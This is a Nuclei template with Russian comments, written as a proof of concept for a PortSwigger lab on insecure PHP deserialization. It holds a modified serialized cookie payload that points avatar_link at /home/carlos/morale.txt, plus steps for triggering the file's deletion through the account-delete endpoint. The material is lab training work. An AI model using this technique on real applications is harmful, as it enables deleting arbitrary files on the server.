# POC
# Решение
# 1. Зайти как wiener
# 2. Декодировать куку >>> O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"ctwsoz7esuhsslfhvqougyl7lmclwhqg";s:11:"avatar_link";s:18:"users/gregg/avatar";}
# 3. Так как есть функционал удаления аккаунта а в куке явно прописан путь до каталога с файлами пользователя - можно заменить путь на файл /home/carlos/morale.txt
# 4. Заменить значения >>> O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"ctwsoz7esuhsslfhvqougyl7lmclwhqg";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
# 5. Обратно закодировать и заменить куку на новую и обновить страницу
# 6. Направить запрос POST /my-account/delete. Для этого можно перехватить запрос POST на загрузку аватара и заменить URL

id: POC_lab-deserialization-using-application-functionality-to-exploit-insecure-deserialization

info:
  name: POC_lab-deserialization-using-application-functionality-to-exploit-insecure-deserialization
  author: FIR_UIII
  severity: info
  description: Using application functionality to exploit insecure deserialization
  reference: https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-application-functionality-to-exploit-insecure-deserialization  
  tags: deserialization,portswigger


http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        
        username=gregg&password=rosebud
    
    redirects: true
    cookie-reuse: true

    extractors:
    - type: regex
      name: cookie_encoded # выводит в консоль значени куки - нужно декодировать из base64
      part: header
      group: 1 # берет только указанную regex группу от 0 до n т.е значение внутри ()
      regex:
        - 'session=(.{144})'

    matchers-condition: and
    matchers:
    - type: dsl
      dsl:
      - len(cookie_encoded) >= 140 # сравниват ожидаемую длину
    - type: word
      part: body # ищем по ключевому слову
      words:
      - 'Delete account'
